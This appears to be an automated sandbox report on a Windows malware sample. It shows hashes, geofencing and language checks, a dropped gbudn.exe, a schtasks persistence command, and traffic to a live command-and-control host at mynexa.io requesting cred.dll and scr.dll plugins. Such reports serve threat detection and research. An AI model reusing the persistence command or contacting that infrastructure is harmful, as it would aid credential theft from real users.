Overview
overview
10Static
static
100468127a19...1f.exe
windows7-x64
30468127a19...1f.exe
windows10-2004-x64
32a3b92f618...6b.exe
windows7-x64
102a3b92f618...6b.exe
windows10-2004-x64
10b154ac015c...cf.exe
windows7-x64
8b154ac015c...cf.exe
windows10-2004-x64
8b96bd6bbf0...69.exe
windows7-x64
10b96bd6bbf0...69.exe
windows10-2004-x64
10bb8e52face...3e.dll
windows7-x64
8bb8e52face...3e.dll
windows10-2004-x64
8ca467e3323...a4.dll
windows7-x64
10ca467e3323...a4.dll
windows10-2004-x64
8e93d6f4ce3...ad.exe
windows7-x64
10e93d6f4ce3...ad.exe
windows10-2004-x64
10fa5390bbcc...f6.exe
windows7-x64
10fa5390bbcc...f6.exe
windows10-2004-x64
10Analysis
-
max time kernel
137s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13/09/2024, 15:23 UTC
Behavioral task
behavioral1
Sample
0468127a19daf4c7bc41015c5640fe1f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0468127a19daf4c7bc41015c5640fe1f.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
2a3b92f6180367306d750e59c9b6446b.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
2a3b92f6180367306d750e59c9b6446b.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
b154ac015c0d1d6250032f63c749f9cf.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
b154ac015c0d1d6250032f63c749f9cf.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
b96bd6bbf0e3f4f98b606a2ab5db4a69.exe
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
b96bd6bbf0e3f4f98b606a2ab5db4a69.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
bb8e52face5b076cc890bbfaaf4bb73e.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
bb8e52face5b076cc890bbfaaf4bb73e.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
ca467e332368cbae652245faa4978aa4.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
ca467e332368cbae652245faa4978aa4.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
e93d6f4ce34d4f594d7aed76cfde0fad.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
e93d6f4ce34d4f594d7aed76cfde0fad.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
fa5390bbcc4ab768dd81f31eac0950f6.exe
Resource
win7-20240704-en
General
-
Target
2a3b92f6180367306d750e59c9b6446b.exe
-
Size
178KB
-
MD5
2a3b92f6180367306d750e59c9b6446b
-
SHA1
95fb90137086c731b84db0a1ce3f0d74d6931534
-
SHA256
18fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0
-
SHA512
c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0
-
SSDEEP
3072:GK0YqBB9mUQ13o2vM2tD81JI0MBkuomh87I3pBSpvVFLm:GnrB9mUWdk26DIquom2dN
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation 2a3b92f6180367306d750e59c9b6446b.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation gbudn.exe -
Executes dropped EXE 4 IoCs
pid Process 3380 gbudn.exe 1216 gbudn.exe 5072 gbudn.exe 4460 gbudn.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2a3b92f6180367306d750e59c9b6446b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gbudn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1408 schtasks.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2504 wrote to memory of 3380 2504 2a3b92f6180367306d750e59c9b6446b.exe 84 PID 2504 wrote to memory of 3380 2504 2a3b92f6180367306d750e59c9b6446b.exe 84 PID 2504 wrote to memory of 3380 2504 2a3b92f6180367306d750e59c9b6446b.exe 84 PID 3380 wrote to memory of 1408 3380 gbudn.exe 85 PID 3380 wrote to memory of 1408 3380 gbudn.exe 85 PID 3380 wrote to memory of 1408 3380 gbudn.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe"C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\ProgramData\3101f8f780\gbudn.exe"C:\ProgramData\3101f8f780\gbudn.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gbudn.exe /TR "C:\ProgramData\3101f8f780\gbudn.exe" /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1408
-
-
-
C:\ProgramData\3101f8f780\gbudn.exeC:\ProgramData\3101f8f780\gbudn.exe1⤵
- Executes dropped EXE
PID:1216
-
C:\ProgramData\3101f8f780\gbudn.exeC:\ProgramData\3101f8f780\gbudn.exe1⤵
- Executes dropped EXE
PID:5072
-
C:\ProgramData\3101f8f780\gbudn.exeC:\ProgramData\3101f8f780\gbudn.exe1⤵
- Executes dropped EXE
PID:4460
Network
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmynexa.ioIN AResponsemynexa.ioIN A188.40.187.155
-
Remote address:188.40.187.155:80RequestPOST /hfv23svj2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mynexa.io
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Fri, 13 Sep 2024 15:23:44 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
-
Remote address:188.40.187.155:80RequestGET /hfv23svj2/plugins/cred.dll HTTP/1.1
Host: mynexa.io
ResponseHTTP/1.1 404 Not Found
Date: Fri, 13 Sep 2024 15:23:44 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
-
Remote address:188.40.187.155:80RequestGET /hfv23svj2/plugins/scr.dll HTTP/1.1
Host: mynexa.io
ResponseHTTP/1.1 404 Not Found
Date: Fri, 13 Sep 2024 15:23:55 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
-
Remote address:188.40.187.155:80RequestPOST /hfv23svj2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mynexa.io
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Fri, 13 Sep 2024 15:24:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
-
Remote address:8.8.8.8:53Request155.187.40.188.in-addr.arpaIN PTRResponse155.187.40.188.in-addr.arpaIN PTRstatic15518740188clientsyour-serverde
-
Remote address:8.8.8.8:53Requestfe3cr.delivery.mp.microsoft.comIN AResponsefe3cr.delivery.mp.microsoft.comIN CNAMEfe3.delivery.mp.microsoft.comfe3.delivery.mp.microsoft.comIN CNAMEglb.cws.prod.dcat.dsp.trafficmanager.netglb.cws.prod.dcat.dsp.trafficmanager.netIN A20.242.39.171
-
Remote address:8.8.8.8:53Request134.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.211.185.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request103.169.127.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request44.56.20.217.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request81.144.22.2.in-addr.arpaIN PTRResponse81.144.22.2.in-addr.arpaIN PTRa2-22-144-81deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request81.144.22.2.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request21.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:188.40.187.155:80RequestPOST /hfv23svj2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mynexa.io
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Fri, 13 Sep 2024 15:25:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
-
554 B 418 B 7 6
HTTP Request
POST http://mynexa.io/hfv23svj2/index.phpHTTP Response
404 -
1.3kB 915 B 15 10
HTTP Request
GET http://mynexa.io/hfv23svj2/plugins/cred.dllHTTP Response
404HTTP Request
GET http://mynexa.io/hfv23svj2/plugins/scr.dllHTTP Response
404HTTP Request
POST http://mynexa.io/hfv23svj2/index.phpHTTP Response
404 -
462 B 338 B 5 4
HTTP Request
POST http://mynexa.io/hfv23svj2/index.phpHTTP Response
404
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
55 B 71 B 1 1
DNS Request
mynexa.io
DNS Response
188.40.187.155
-
150 B 296 B 2 2
DNS Request
155.187.40.188.in-addr.arpa
DNS Request
fe3cr.delivery.mp.microsoft.com
DNS Response
20.242.39.171
-
72 B 158 B 1 1
DNS Request
134.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
133.211.185.52.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
103.169.127.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
71 B 131 B 1 1
DNS Request
44.56.20.217.in-addr.arpa
-
140 B 133 B 2 1
DNS Request
81.144.22.2.in-addr.arpa
DNS Request
81.144.22.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
21.236.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
178KB
MD52a3b92f6180367306d750e59c9b6446b
SHA195fb90137086c731b84db0a1ce3f0d74d6931534
SHA25618fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0
SHA512c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0